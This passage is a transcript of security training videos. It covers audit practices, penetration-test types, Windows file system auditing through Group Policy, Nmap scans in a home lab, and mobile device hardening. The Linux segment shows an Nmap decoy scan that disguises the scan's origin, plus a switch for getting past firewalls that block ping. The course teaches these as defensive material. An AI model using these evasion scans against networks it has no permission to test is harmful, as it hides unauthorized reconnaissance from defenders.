Some best practices relating to auditing begin with understanding that the unique organization has specific
business and security needs that will be different from other organizations. And so as a result, the security
policies will be unique. We should only audit security principles of interest. A security principle is a user or a
group, or a device, or a piece of software. We don't want to enable, for example, access to every file on every
file server for every user. We want to be a little bit more specific than that. We also want to audit only relevant
events, such as the success of accessing a restricted database, or perhaps only auditing the failure of an attempt
to access a secure database.
So what we're talking about doing here is avoiding audit message fatigue. If you audit too much, you'll be
receiving too many audit message alerts and then it begins to lose its meaning. We should also make sure that
audit logs that retain audit events themselves are protected. They should have auditing and access control
mechanisms applied. They should also be encrypted. We should store an additional copy of audit logs away
from the device that itself, is being audited, in case it gets compromised. We should always ensure users have a
unique log on account because if we don't, then we don't have a way for users to be accountable for the use of
that account. And auditing always requires continuous centralized monitoring because we want to make sure
that over time, our security processes and controls are still effective.
Auditing also includes conducting periodic scans, such as vulnerability scanning of either a host or a network
to identify weaknesses, such as ports that are open that shouldn't be or missing software patches. Penetration
testing is a little bit different because instead of simply identifying vulnerabilities there is an attempt to exploit
those vulnerabilities. And this is done so that we can determine the security posture of an organization. But the
think about penetration testing is it's not passive like vulnerability scanning. It can actually render systems
unstable or even unusable if a vulnerability is successfully exploited by the pen testing team.
So we have to make sure ahead of time, that when a pen test is going to be conducted against an organization,
that there are specific times of day that are set aside for this. And that non-disclosure agreements or NDAs are
also signed by the pen testers because they might gain access to very sensitive information as they run
penetration tests. We should also determine whether an internal versus an external security auditing team
should be used. To remain compliant with some regulations, it might require that we have a third party or a set
of external auditors conducting the audit. There are a few types of security audits that can be conducted by
security IT teams, one of which is the Black Box test.
This means that no implementation details are provided to the pen test team. And so therefore, only public data
is available to them to determine which systems are in use, which versions, and how it's been implemented. So
this is really the best gauge of real attacks from the outside, when attackers would have no access to internal
information. Another type of audit or test is a White Box test, where internal implementation details are
provided. So this is the same type of knowledge that employees might have. And we all know that sometimes,
security breaches are the result of insider jobs. So it's also important to conduct this type of test periodically as
well.
And certainly, it would be more thorough than a Black Box text because of the amount of knowledge that
would be available to the pen testers. Knowledge of internal systems and processes, even software
development and code review practices used by the specific organization. Finally, we've also got Grey Box
testing where only some implementation details are provided to the pen test team. It could be things like
network documentation or organizational security policies, maybe only a subset of those policies. So this is a
good representation then of what social engineering attackers might know by trying to trick users to divulge
some information.
In this video, you will enable file system auditing using Group Policy.
Objectives
[Video description begins] Topic title: Enable Windows File System Auditing. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll use Windows Server 2016 to enable Windows File System Auditing. File System
Auditing allows us to track access to a given file. Whether the people are opening the file, or attempting to
open the file, or attempting to delete it and so on. To get started here on my server, I'm going to go to my Start
menu and fire up the Active Directory Users and Computers tool. This server is an Active Directory domain
controller. And so we're going to take a quick peek at any user accounts that might be available or security
principals that we want to audit.
[Video description begins] The Active Directory Users and Computers window opens. It is divided into four
parts. The first part is the menu bar. The second part is the toolbar. The third part is the Active Directory
Users and Computers pane. It contains the Saved Queries and fakedomain1.local root nodes. The
fakedomain1.local root node includes the LasVegas subnode, which further contains the Computers, Groups,
and Users subnodes. The Users subnode is selected. The fourth part is the content pane. It contains a table.
This table has the column headers: Name, Type, and Description. The Name column header has the value,
User One. The Type column header has the value, User. The Description column has no value. [Video
description ends]
Here I've got a user called User One so that is the account I'm going to audit access to a specific file in the file
system.
[Video description begins] He selects the User One value in the Name column header. [Video description
ends]
Here in the file system on that same server, although it doesn't have to be the same server, it could be just
another server joined to the domain.
[Video description begins] He opens the File Explorer window. It is divided into four parts. The first part is
the menu bar. The second part includes the address bar. The third part displays a list of drives and folders.
The fourth part displays the contents of the drive or folder selected in the third part. The Local Disk (C:) drive
is selected in the third part. The fourth part includes the Projects folder. [Video description ends]
But I've got a file location here on Drive C called Projects. It's a folder in which there are three sample files.
[Video description begins] He opens the Projects folder given in the fourth part. It contains three files, named
Project_A.txt, Project_B.txt, and Project_C.txt. [Video description ends]
What I want to do is enable auditing of user one's access to the Projects folder here on the server.
[Video description begins] He switches back to the list of contents displayed in the fourth part. He closes the
File Explorer window. [Video description ends]
The first thing we need to do is to turn on the option for auditing file systems. And that is done through group
policies. So on my server, I'll fire up my menu and go into the Group Policy Management tool.
[Video description begins] The Group Policy Management window opens. It is divided into four parts. The
first part is the menu bar. The second part is the toolbar. The third part contains the Group Policy
Management root node. It contains the Forest: fakedomain1.local subnode. It includes the Domains subnode.
This subnode contains the fakedomain1.local subnode, which further includes the Default Domain Policy,
Admins, Boston, and LasVegas subnodes. The Default Domain Policy subnode is selected. The fourth part
contains the Default Domain Policy page. It contains the Scope, Details, Settings, and Delegation tabs and
three sections. The first section is Links. The second section is Security Filtering. The third section is WMI
Filtering. [Video description ends]
I want this applied at the entire Active Directory domain level. So I'm going to go ahead and right-click
Default Domain Policy, that is there automatically, and I'll choose Edit.
[Video description begins] The Group Policy Management Editor window opens. It is divided into four parts.
The first part is the menu bar. The second part is the toolbar. The third part includes the Computer
Configuration and User Configuration root nodes. The Computer Configuration root node contains the
Policies and Preferences subnodes. The User Configuration root node also contains the Policies and
Preferences subnodes. The fourth part displays the information of the selected node in the third part. [Video
description ends]
Now because auditing is a security item we're going to find that most security items in group policy exist under
Computer Configuration and not under User Configuration. So under Computer Configuration, I'm going to go
ahead and expand Policies. Then I need to drill down under Windows Settings and then Security Settings. And
then finally, I've got my audit policy information listed down at the bottom.
[Video description begins] He expands the Policies subnode. This subnode includes the Windows Settings
subnode. He expands this subnode. It includes the Security Settings subnode. He expands this subnode. It
includes the Advanced Audit Policy Configuration subnode. He expands this subnode. It contains the Audit
Policies subnode. He expands this subnode. It includes the Object Access subnode. He selects this subnode.
The fourth part displays a table with the column headers: Subcategory and Audit Events. [Video description
ends]
[Video description begins] He highlights the row entry: Subcategory: Audit File System and Audit Events: Not
Configured. [Video description ends]
Then on the right, I can see I have the ability to audit the file system as well as the file shares, shared folders.
[Video description begins] He highlights the row entry: Subcategory: Audit File Share and Audit Events: Not
Configured. [Video description ends]
But I'm interested in the file system. I'm going to double-click on that and I'm going to turn on the check
mark to configure audit events for both success and failure.
[Video description begins] The Audit File System Properties dialog box opens. It includes the Policy tab and
the OK button. The Policy tab includes the Configure the following audit events: checkbox. The Success and
Failure checkboxes are given below this checkbox. These are disabled. [Video description ends]
Maybe you want to audit when people successfully open project files or maybe you only want to audit when
people try to, but it fails, or maybe both as in my case.
[Video description begins] He selects the Configure the following audit events: checkbox. The Success and
Failure checkboxes get enabled. He selects these checkboxes. [Video description ends]
[Video description begins] He clicks the OK button and the Audit File System Properties dialog box
closes. [Video description ends]
The next thing I need to do is to go back into the file system to configure auditing further. So here is the
Projects folder that we were talking about.
[Video description begins] He switches to the File Explorer window. [Video description ends]
So I've turned on the overall potential for auditing. But I'm not yet auditing the Projects folder. To do that I
need to right-click on that folder. The same step would apply to an individual file that you want to audit too.
I've right-clicked on the folder, I'm going to go into the Properties, going to go under Security.
[Video description begins] The Project Properties dialog box opens. It includes the Security tab. [Video
description ends]
Then I'll click the Advanced button and then I'll click the Auditing tab.
[Video description begins] The Advanced Security Settings for Projects window opens. It includes the Auditing
tab. [Video description ends]
We can see down below currently, nobody is being audited at least for this folder Projects.
[Video description begins] He clicks the Auditing tab. It displays a table with the column headers: Type,
Principal, Access, Inherited from, and Applies to and the Add button. These column headers are empty. [Video
description ends]
[Video description begins] The Auditing Entry for Projects window opens. It includes the Select a principal
link, Type and Applies to drop-down list boxes, the Full control, Modify, Read & execute, List folder contents,
Read, Write, and Special permissions checkboxes, and the OK button. The Type and Applies to drop-down list
boxes and the Full control, Modify, Read & execute, List folder contents, Read, Write, and Special permissions
checkboxes are disabled. The Read & execute, List folder contents, and Read checkboxes are selected. [Video
description ends]
And I'm going to click Select a principal, which in this case is going to be my user uone, user one.
[Video description begins] The Select User, Computer, Service Account, or Group dialog box opens. It
includes the Enter the object name to select (examples): text box and the Check Names button. This button is
disabled. [Video description ends]
Now we could also specify a group and so on. I can determine if I want to audit the success or failure or all
types of events.
[Video description begins] He types uone in the Enter the object name to select (examples): text box. The
Check Names button gets enabled. He clicks this button. The uone text changes to User One
([email protected]). He then clicks the OK button, and the dialog box closes. The Type and Applies to
drop-down list boxes and the Full control, Modify, Read & execute, List folder contents, Read, and Write
checkboxes get enabled. [Video description ends]
[Video description begins] He selects the All value in the Type drop-down list box. [Video description ends]
And I don't care if it applies to the folder, subfolders or files within it, but I want to start in the file system
hierarchy at the Projects folder. And maybe I'm interested in checking out the use of Read & execute, List
folder contents, Read, and also let's say maybe even Write.
[Video description begins] He selects the Write checkbox. [Video description ends]
So I've got this now set up, I'm going to click OK. There is my user principal that I'm auditing for the Projects
folder UOne.
[Video description begins] The column headers: Type, Principal, Access, Inherited from, and Applies to, in the
Advanced Security Settings for Projects window get populated with the All, User One
([email protected]), Read, write & execute, None, and This folder, subfolders and files values,
respectively. [Video description ends]
[Video description begins] The Advanced Security Settings for Projects window closes. [Video description
ends]
So to test this I'm going to connect as user one to the Projects folder and try to access something because that
should trigger events to be written to this server's security log.
[Video description begins] The Projects Properties dialog box closes. [Video description ends]
Before I test this I'm just going to share out this Projects folder on the network.
[Video description begins] He right-clicks the Projects folder and selects the Properties option. The Projects
Properties dialog box opens. [Video description ends]
So I'm going to right-click, go into the Properties, go into Sharing and I'll click Advanced Sharing.
[Video description begins] He clicks the Sharing tab. It includes the Advanced Sharing button. [Video
description ends]
[Video description begins] He clicks the Advanced Sharing button. The Advanced Sharing dialog box opens. It
includes the Share this folder checkbox and the Permissions and OK buttons. The Share this folder checkbox is
selected. [Video description ends]
And for the permissions, if I click Permissions, we can see everyone has got at least Read, so I'll just add Read
and Change.
[Video description begins] He hovers over the Share this folder checkbox. [Video description ends]
And of course I can also specify further permissions or less permissions for specific files in that folder.
[Video description begins] The Permissions for Projects dialog box opens. It includes a table with the column
headers: Permissions for Everyone, Allow, and Deny. The Permissions for Everyone column header has the
values: Full Control, Change, and Read. The Allow and Deny column headers have three checkboxes. The
checkbox in the Allow column header for the Read value in the Permissions for Everyone column header is
selected. [Video description ends]
I could go into Security for it and determine the permissions that are assigned at the individual NTFS file level.
[Video description begins] He closes the Permissions for Projects dialog box. [Video description ends]
And remember that when you combine sharing folder permissions, the most restrictive applies.
[Video description begins] He closes the Projects Properties dialog box and opens the Projects folder. [Video
description ends]
From a Windows 10 station, I'm going try to connect to the UNC path of that host, double backslash.
[Video description begins] The Project_A.txt Properties dialog box opens. It includes the Security tab and the
Cancel button. [Video description ends]
I know the IP address and I know that the folder here is called Projects.
[Video description begins] He clicks the Security tab. It includes the Group or user names list box and a table.
The Group or user names: text box includes the Users (FAKEDOMAIN1\Users) value. He selects this value.
The table shows the column headers: Permissions for Users, Allow, and Deny. The Permissions for Users
column header has the values: Full Control, Modify, Read & Execute, Read, Write, and Special permissions.
The Allow column has two tick marks for the Read & Execute and Read values in the Permissions for Users
column header. The Deny column has no value. [Video description ends]
[Video description begins] He hovers over the tick marks. [Video description ends]
So the domain is fakedomain1\, the user name is uone and I'll pop in the password for that account.
[Video description begins] He clicks the Cancel button and the Project_A.txt Properties dialog box
closes. [Video description ends]
[Video description begins] He opens another File Explorer window. [Video description ends]
[Video description begins] He types \\192.168.0.231\projects in the address bar and presses the Enter key. The
Windows Security dialog box opens. It includes the User name and Password text boxes and the OK button.
He types fakedomain1\uone in the User name text box and password in the Password text box. He then clicks
the OK button to close the dialog box. [Video description ends]
And we can see indeed that the Project_A.txt file, which only contains sample text has actually been opened
up.
[Video description begins] He switches back to the previous File Explorer window. He opens the Project_A.txt
file. [Video description ends]
So we've gone ahead and accessed that file. Now bear in mind, in order for this to trigger the audit event to be
written to the security log of the server, group policy needs to have been refreshed on affected machines, such
as on the server that we are auditing. That refresh should happen automatically on the server.
[Video description begins] He switches back to the File Explorer window. [Video description ends]
But if you're actually testing this and it's not working, and you've done the configuration very quickly, you
might want to go into a Command Prompt on the server and then force a Group Policy refresh such as
gpupdate /force.
[Video description begins] He clicks the Start menu and types cmd. The Command Prompt option appears. He
selects this option. The Administrator: Command Prompt window opens. The C:\Users\Administrator> prompt
is displayed. [Video description ends]
And if you see messages like Computer Policy update has completed successfully, User Policy update has
completely successfully, you know you're good on the server that you've configured to audit.
[Video description begins] He executes the gpupdate /force command. The C:\Users\Administrator> prompt is
displayed. [Video description ends]
Because the computer policy, as you recall, when we were configuring it, is where we drilled down into the
security section to configure the auditing. So on the server that has the file system that I'm auditing, I'm going
to go ahead and take a look at the Event Viewer. So, from the Start menu, I'll type then, and I'll go into the
Event Viewer.
[Video description begins] He clicks the Start menu and types eve. The Event Viewer option appears. He
selects this option. The Event Viewer window opens. It is divided into five parts. The first part is the menu bar.
The second part is the toolbar. The third part is the Event Viewer (Local) pane. It includes the Custom Views
and Windows Logs root nodes. The fourth part is the content pane. It displays the information of the node
selected in the Event Viewer (Local) pane. The fifth part is the Actions pane. [Video description ends]
What I want to do is drill down on the left under Windows Logs and Security Log.
[Video description begins] He expands the Windows Logs root node. It includes the Security option. [Video
description ends]
[Video description begins] He selects the Security option. The Security page opens in the content pane. It is
divided into two parts. The first part includes a table with the column headers: Keywords, Date and Time,
Source, Event ID, and Task Category. The second part includes the General tab. [Video description ends]
And over on the right, I can either search or I can see I've got an audit message listed here for
FAKEDOMAIN1\UOne.
[Video description begins] He selects the row entry: Keywords: Audit Success, Date and Time: 1/8/2019
10:14:29 AM, Source: Microsoft Windows security, Event ID: 4656, and Task Category: File System. The
General tab includes Security ID: FAKEDOMAIN1\UOne and Object Name: C:\Projects\
Project_A.txt. [Video description ends]
[Video description begins] He highlights UOne in Security ID: FAKEDOMAIN1\UOne. [Video description
ends]
And it looks like that user read a file here called Project A.txt.
[Video description begins] He highlights Project_A.txt in the Object Name: C:\Projects\Project_A.txt. [Video
description ends]
And of course, we can see the date and time stamp that goes along with that audit event.
Find out how to scan hosts for security weaknesses from a Windows computer.
Objectives
[Video description begins] Topic title: Conduct a Vulnerability Assessment Using Windows. The presenter is
Dan Lachance. [Video description ends]
In this demonstration, I'll conduct a network vulnerability scan from a Windows 10 station. The problem is that
Windows 10 does not include a vulnerability scanner by default within the operating system. But that is okay
because we can go and download the free Nmap tool which I've already done. So I'm going to go to my Start
menu, type in nmap and there it is the Zenmap tool with the front end GUI which is part of Nmap.
[Video description begins] The Zenmap window opens. It is divided into four parts. The first part is the menu
bar. The second part contains the Target combo box, the Profile drop-down list box, Command text box, and
the Scan and Cancel buttons. The Intense scan value is selected in the Profile drop-down list box. The
Command text box has the command, nmap -T4 -A -v. The third part contains the Hosts and Services buttons
and the OS and Host column headers. The fourth part contains the Nmap Output, Ports / Hosts, Topology,
Host Details, and Scans tabs. The Nmap Output tab is selected. It displays a drop-down list box and the
Details button. These are disabled. [Video description ends]
I'm going to go ahead and click on that, and the first thing I have to do is determine what the target is. Am I
trying to scan a single host for vulnerabilities or subset of hosts or the entire subnet? In this case, I'm going to
put in 192.168.0 which is my network and then 0.1-254. I want to scan all host IP addresses on the 192.168.0
subnet.
[Video description begins] He types 192.168.0.1-254 in the Target combo box. The command in the Command
text box changes to nmap -T4 -A -v 192.168.0.1-254. [Video description ends]
Then I have to determine the scanning profile I'm going to use. Do I want to perform an intense scan which
would take longer than a quick scan?
[Video description begins] He clicks the Profile drop-down list box. A list of options appears. It includes the
Quick scan option. [Video description ends]
And notice when I choose a different profile it's going to be modifying the Nmap command that is going to be
executed.
[Video description begins] He hovers over the nmap -T4 -A -v 192.168.0.1-254 command in the Command text
box. [Video description ends]
[Video description begins] He selects the Quick Scan option. The nmap -T4 -A -v 192.168.0.1-254 command in
the Command text box changes to nmap -T4 -F 192.168.0.1-254. [Video description ends]
And if you are familiar with Nmap command line syntax already, then you can go ahead and pop it in here.
And it will take it as you execute or run the scan, which we do by clicking the Scan button in the upper-right,
which I'll do now.
[Video description begins] He clicks the Scan button. The output appears in the Nmap Output tab. The Host
column header includes the hosts: 192.168.0.1, 192.168.0.2, 192.168.0.3, 192.168.0.5, 192.168.0.6, and
192.168.0.7. The output displays the details of each host in a separate section. [Video description ends]
And after a moment, in the left-hand navigator, we can see it's discovered a number of hosts that are up and
running up on the subnet.
[Video description begins] He selects the 192.168.0.2, 192.168.0.3, 192.168.0.5, 192.168.0.6, and 192.168.0.7
hosts. [Video description ends]
On the right, we can also see the Nmap Output where each host is separated with a blank line.
[Video description begins] He highlights 192.168.0.1 in the output line: Nmap scan report for
192.168.0.1. [Video description ends]
We've got sections for each host where to list things like the IP address of the host, port information, which is
whether the port is open and listening.
[Video description begins] He highlights the entries of the table displayed in the details of 192.168.0.1 in the
output. This table has three column headers: PORT, STATE, and SERVICE. The entries in the first row are:
53/tcp, open, and domain, respectively. The entries in the second row are: 80/tcp, open, and http, respectively.
The entries in the third row are: 443/tcp, open, and https, respectively. The entries in the fourth row are:
5000/tcp, open, and upnp, respectively. [Video description ends]
Or whether it's filtered which normally means that it's being blocked by a firewall rule.
[Video description begins] He highlights filtered in the output line: 8081/tcp filtered blackice-icecap. [Video
description ends]
We can also see the hardware or the MAC Address of the device and on the left, I can also click on Services
and view things from this perspective.
[Video description begins] He highlights 2C:99:24:5A:17:C0 in the output line: MAC Address:
2C:99:24:5A:17:C0 (Arris Group). [Video description ends]
For example, I want to see all the jetdirect network printers out there.
[Video description begins] He clicks the Service button. The Service pane opens. It includes the afp, blackice-
icecap, dc, domain, http, http-proxy, https, ida-agent, jetdirect, and microsoft-ds. [Video description ends]
So I can click jetdirect and I can see the IP here listing on TCP Port 9100 which is normal for network
printing.
[Video description begins] He clicks the jetdirect service. The Port / Hosts tab in the fourth part shows a table
with the column headers: Hostname, Port, Protocol, State, and Version. The Hostname column header has the
value, 192.168.0.5. The Port column header has the value, 9100. The Protocol column header has the value,
tcp. The State column header has the value, open. The Version column header has no value. [Video description
ends]
And maybe I want to look for web servers so I could click on http.
[Video description begins] He clicks the http service. The Port / Hosts tab in the fourth part shows a table with
the column headers: Hostname, Port, Protocol, State, and Version. The Hostname column header has the
values, 192.168.0.1, 192.168.0.3, 192.168.0.5, 192.168.0.6, and 192.168.0.13. The Port column header has the
value, 80, for each row. The Protocol column header has the value, tcp, for each row. The State column
header has the value, open, for each row. The Version column header has no value. [Video description ends]
Maybe there is only supposed to be one on the network, but here I see five listed. And this is one of the reasons
we conduct vulnerability scans, so that we can identify weaknesses and harden our network environment.
[Video description begins] He hovers over the Hostname column header values. [Video description ends]
The bad guys would use the same type of tool and techniques to perform reconnaissance, to find weaknesses
that they can exploit. So we want to make sure we get to it before they do. We can also click the Topology tab
here.
[Video description begins] The Topology tab displays three buttons, named Hosts Viewer, Fisheye, and
Controls and the diagram of the hosts found on the network. The diagram shows the connections between the
hosts on the network. The different hosts on the network are 192.168.0.2, 192.168.0.20, 192.168.0.13,
192.168.0.252, 192.168.0.11, 192.168.0.9, 192.168.0.8, 192.168.0.5, 192.168.0.12, 192.168.0.7, 192.168.0.6,
and 192.168.0.1. [Video description ends]
Now, I can't really see the devices here that it's found on my network. If I click Fisheye, it spreads them out a
little bit.
[Video description begins] The list of controls includes the Zoom control. [Video description ends]
But I can also click on Controls, which shows me a list of controls over in the right-hand side of the screen.
And one of the things I can do is actually zoom in.
[Video description begins] He zooms in the diagram using the Zoom control. [Video description ends]
Now when I've done that, notice that I have got circles for each detected host and they are different colors.
Some are green, some are yellow, some are red. The idea is that green means that it has less than three open
ports that were discovered. But if it's got between three and six open ports, it'll be yellow and red is not good
because it's got more than six open ports. And of course, the larger the circle, the more open ports that were
discovered. The little padlock means that there are some filtered ports on that device normally due to firewall
settings on a host-based firewall.
[Video description begins] He clicks the Host Details tab. It does not display anything. [Video description
ends]
We can also click Host Details over here to view specific host details, which we could also trigger from the
Topology.
[Video description begins] He clicks the Topology tab. He then clicks the Hosts Viewer button. The Hosts
Viewer window opens. It is divided into two parts. The first part is the Hosts pane. It displays a list of hosts,
which includes 192.168.0.6. The second part contains the General, Services, and Traceroute tabs. The
General tab is selected. It contains three expandable sections, named General information, Operating System,
and Sequences. The General information section is expanded. It contains the Address and Hostname drop-
down list boxes. [Video description ends]
Actually, I'll do it from here, because if I click Host Viewer, I get a list of the hosts.
[Video description begins] He hovers over the list of hosts in the Hosts pane. [Video description ends]
Again, we now know what the color coding means, and so I could click on one of them.
[Video description begins] He clicks the 192.168.0.6 host. The Address drop-down list box shows the value,
[ipv4] 192.168.0.6. The Hostname drop-down list box does not show any value. [Video description ends]
We haven't done an intense scan, so we don't see any operating system info.
[Video description begins] He expands the Operating System expandable section. It shows the message: No
OS information. [Video description ends]
[Video description begins] He clicks the Services tab. It contains three tabs: Ports (2), Extraports (98), and
Special fields. The Ports (2) tab is selected by default. It displays a table with five column headers: Port,
Protocol, State, Service, and Method. The Port column header has the values, 22 and 80. The Protocol column
header has the value, tcp, for all the rows. The State column header has the value, open, for all the rows. The
Service column header has the values, ssh and http. The Method column header has the value, table, for all the
rows. [Video description ends]
And of course, if we've got three or fewer open ports, then that is when we have a device or a host that will
show up with a green color listed here.
[Video description begins] He closes the Hosts Viewer window. [Video description ends]
We can also see any past scans, here is our current scan that is currently got a status of Unsaved.
[Video description begins] He clicks the Scans tab. It shows two column headers: Status and Command. The
Status column header has the value, Unsaved. The Command column header has the value, nmap -T4 -F
192.168.0.1-254. [Video description ends]
So we can go to the scan menu and we can save the scan as an XML document.
[Video description begins] He clicks Save Scan in the Scan menu. The Save Scan dialog box opens. It includes
the Name text box, Select File Type drop-down list box, and the Cancel and Save buttons. The Name text box
contains the value, .xml. The Select File Type drop-down list box shows the value, Nmap XML format
(.xml). [Video description ends]
So that we could perhaps establish a baseline of what is normal and what should be on the network.
[Video description begins] He clicks the Cancel button, and the Save Scan dialog box closes. [Video
description ends]
And what is cool is that we can also go to the Tools menu and compare to scans to see what is changed over
time such as the presence of a new machine on the network perhaps that shouldn't be there.
[Video description begins] He clicks Compare Results in the Tools menu. The Compare Results window opens.
It contains two sections, A Scan and B Scan. Both these sections includes a drop-down list box and the Open
button. [Video description ends]
[Video description begins] He closes the Compare Results window. [Video description ends]
And it's one of those things that we should run on a periodic basis to make sure we know what is on the
network and whether or not we've got too many vulnerabilities.
[Video description begins] Topic title: Conduct a Vulnerability Assessment Using Linux. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll conduct a network vulnerability scan from a Linux station. I'm using Kali Linux,
which is a Linux distribution that contains many security tools including Nmap, which we can use to conduct a
vulnerability scan.
[Video description begins] The root@kali: ~ command line window is open. The root@kali:~# prompt is
displayed. [Video description ends]
Here from the command line on Kali Linux, I'm going to run Nmap. And I'm just going to give it a single IP
address so that I can scan just a single post.
[Video description begins] He executes the command: nmap 192.168.0.1. The scanning for 192.168.0.1 gets
completed and the report is displayed in the output. The prompt does not change. [Video description ends]
After a moment, we can see the scan is completed for, in this case, 192.168.0.1. And we can see a number of
ports that are listed as being open, such as TCP 53 for DNS, transfer between DNS servers, port 80 and 443 for
http and https respectively
[Video description begins] He highlights the table entries displayed in the output. The table has three column
headers: PORT, STATE, and SERVICE. The PORT column header has the values: 53/tcp, 80/tcp, 443/tcp, and
5000/tcp. The STATE column header has the value, open, for all the rows. The SERVICE column header has
the values: domain, http, https, and upnp. [Video description ends]
. TCP port 5000 for upnp. That is when you probably want to close where you can control it unless you
absolutely need universal plug and play running. And then I might also have some filtered ports which
normally means a firewall is configured to prevent that from being accessed. And there I can also see the MAC
Address.
[Video description begins] He highlights filtered in the output lines: 8081/tcp filtered blackice-icecap 8082/tcp
filtered blackice-alerts. [Video description ends]
Because here from the Nmap command line what I also want to do is scan the network and perform a few extra
things.
[Video description begins] He executes the command: clear. The prompt does not change. [Video description
ends]
So I'm going run nmap. And I'm going to do 192.168.0. Now, I could either put 1-254 here or to scan the entire
subnet, I could also put 0 and then the subnet mask, the number of bits. This is side or notation. It's a /24, so 24
bit subnet mask. In other words, 255.255.255.0, which really means this is my network address, 192.168.0. So
I'm going to scan the subnet. I'm going to scan for port 80, -p80. Now remember in Linux, lower and uppercase
have different meanings. So make sure you're careful about that. And I'm going to use the -D parameter decoy.
What this will let me do is specify a couple of other IP addresses that this scan will look like it originated from.
So I'm just going to put in a couple of other random IPs, doesn't matter which subnet that they're on or
anything like that. And in addition to my own IP, this is what it's going to look like the scan is coming from as
the scan is executing. So this is something that attackers would do when they're performing reconnaissance.
And you'll find that if you want to perform an Nmap scan from outside of a firewall, that might be blocking
ICMP traffic and commands like ping and trace root use ICMP, you might want to also pass a -P0 here. And
what this really means is it tells Nmap to not send out initial ping messages like it normally does by default.
And this way the scan has a better chance of being able to get through firewalls that might block ICMP type of
ping traffic. So I'm going to go ahead and press Enter to begin this scan.
And we can now see that the scan has completed. So we can see the Nmap scan report for specific ports on a
given MAC address and IP address.
[Video description begins] He highlights the output lines: Nmap scan report for 192.168.0.252 Host is up
(0.073s latency). PORT 80/tcp STATE closed SERVICE http MAC Address: 00:00:CA:01:02:03 (Arris
Group). [Video description ends]
And by the way, if you're wondering what all the command line parameters are that are available, you can do
that. You can view it by looking at the man page, the help page.
[Video description begins] He executes the command: clear. The prompt does not change. [Video description
ends]
So man space nmap and then from here, I can go through the help system, navigate through it, to get a
description about how it works.
[Video description begins] He executes the command: man nmap. The Nmap reference guide is displayed as
output. [Video description ends]
And then eventually as we go further down, we'll start seeing all of the command line parameters. And
remember, that upper and lower case letters have a different meaning.
[Video description begins] The Wi-Fi window is open. It is divided into six parts. The first part is the menu
bar. The second part is the toolbar. The third part includes the Apply a display filter ... <Ctrl-/> search box.
The fourth part contains a table with the column headers: No., Time, Source, Destination, Protocol, Length,
and Info. The No. column header includes the values: 7110 and 7111. The Time column header includes the
values: 11.634610 and 11.634723. The Source column header includes the value: 192.168.0.20. The
Destination column header includes the values: 1.1.1.1 and 1.1.1.3. The Protocol column header includes the
value: TCP. The Length column header includes the value: 54. The Info column header includes the value: 80
-> 41701 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0. The fifth part includes the statement: Transmision
Control Protocol, Src Port: 80, Dst Port: 41701, Seq: 1, Ack: 1, Len: 0. The sixth part includes 0000 2c 99 24
5a 17 c0 18 56 80 c3 68 ba 08 00 45 00 ,.$Z...V ..h...E. [Video description ends]
While the scan was running, I was capturing network traffic on the same host from which the scan was being
run. And notice that we've got some listings here related to 1.1.1.1, 1.1.1.3. And there are plenty other ones
throughout the packet captured that was part of our decoy that we wanted to make sure we passed along
through with our Nmap scan.
[Video description begins] He scrolls through the table entries. [Video description ends]
So that it looks like the scan came from a number of different hosts and not just our specific IP address.
After completing this video, you will be able to describe the importance of securing mobile devices.
Objectives
[Video description begins] Topic title: Mobile Device Access Control. The presenter is Dan Lachance. [Video
description ends]
Most organizations these days allow their employees to use mobile devices for increased productivity.
[Video description begins] Mobile Device Access Control [Video description ends]
That is not to say there is no risk in engaging in this activity. There is risk because we've got an entry point for
malware potentially, especially if people are using smartphones also for personal use. So we have to consider
the mobile devices and the apps they're using, whether they're custom built by the organization or whether they
are standard off-the-shelf apps. And we can determine which ones should be allowed to be used by users.
We then have to determine whether mobile devices are using things like certificate authentication. That could
be applicable for VPN access when people are not at the office and want to use their smartphone to access
sensitive systems owned by the organization or sensitive data that results from the use of those systems.
Mobile device management, otherwise called MDM, allows us to centrally control the security settings and to
manage things like applications on mobile devices on a large scale. So we can have a centralized device
inventory so that we know which devices are out there.
How many iOS devices, how many Android devices, and also, which apps are installed on them, and how up
to date they are with virus signatures and so on. So we have centralized management as well as centralized
reporting available as a result of this. Now that is not to mention that we've got centralized configuration to
control all of these items as well. Organizations might allow users to bring their own device.
bring your own device, otherwise called BYOD, allows users to use their personal smartphone for business
use. Certainly, there is risk involved with this. But another potential option is corporate owned personally
enabled devices, otherwise called COPE. This means that the company purchases and owns the device and
allows users to use it of course for business use as well as personal use. But the difference is that the company
gets to control things like the device type. They can all be the same which allows for easier consistent device
management.
Also, the organization can determine how hard they are right from the beginning because the company has
access to the device first. But what is the challenge with this? Well, the challenge with using either bring your
own device or corporate owned personally enabled devices, which is very popular these days, is to make sure
we somehow keep personal and organizational apps and data and settings separate from one another on the
single device. And often with mobile device management solutions, this is referred to as mobile device dual
persona. Because it's being used for personal use, and it's being used for business use. So what can we do to
harden mobile devices, ideally, centrally from our mobile device management solution.
Well, we can enable strong authentication, whether it's strong passwords or multi-factor authentication, MFA,
perhaps where the user is sent a code through SMS text messaging as they try to log in with a username and a
password, or maybe their device needs a PKI certificate. We should also consider enabling remote wipe. So
that if a device is lost or stolen, the IT team has the ability to wipe it so that any sensitive data will not be
available to whoever stole the device, for example. We can also enable device tracking, whether it's through
Internet connectivity or by cell towers, and so on. This way, we can determine where the device is, if it's been
lost or stolen or to track employee locations.
Of course, this is possible with satellite technology through GPS, the Global Positioning System, as well.
Geofencing is another interesting option, where essentially we can control which apps are available, or how
they behave, or even how security settings are applied, depending on the physical location of the user device.
So maybe a sensitive application can only be used when the user is at work with their device. Once they leave
the building, the device is no longer available. And certainly on a personal level, we might have run into this.
If we've gone shopping somewhere, and all of a sudden we get a welcome text message in an app from the
mall, the shopping center. Or maybe we get certain coupons are available, we're in a certain location, and so
on. That is all referred to as geofencing.
Other device hardening options include making sure that the mobile device has a firewall installed. Not just at
the network perimeter but every single computing device should have a personal firewall configured
appropriately as well as antimalware scanning configured. We can also enable encryption on mobile devices
for data at rest, whether it's on the device itself or removable micro SD card. We can also enable encryption for
data in transit for that mobile device through IPsec, which allows us to encrypt all network communications
regardless of the application being used. We could even use a VPN that the user could authenticate to when
they're working away from the office to give them a secure tunnel over the Internet to resources available in
the office. We can also disable a number of settings.
Part of hardening anything is disabling things that are not needed in order to reduce the attack surface. Things
like disabling Bluetooth if we don't need it, disabling connectivity to public Wi-Fi hotspots, preventing users or
removing the ability for them to install apps or perhaps limiting which apps they can install. Enabling GPS
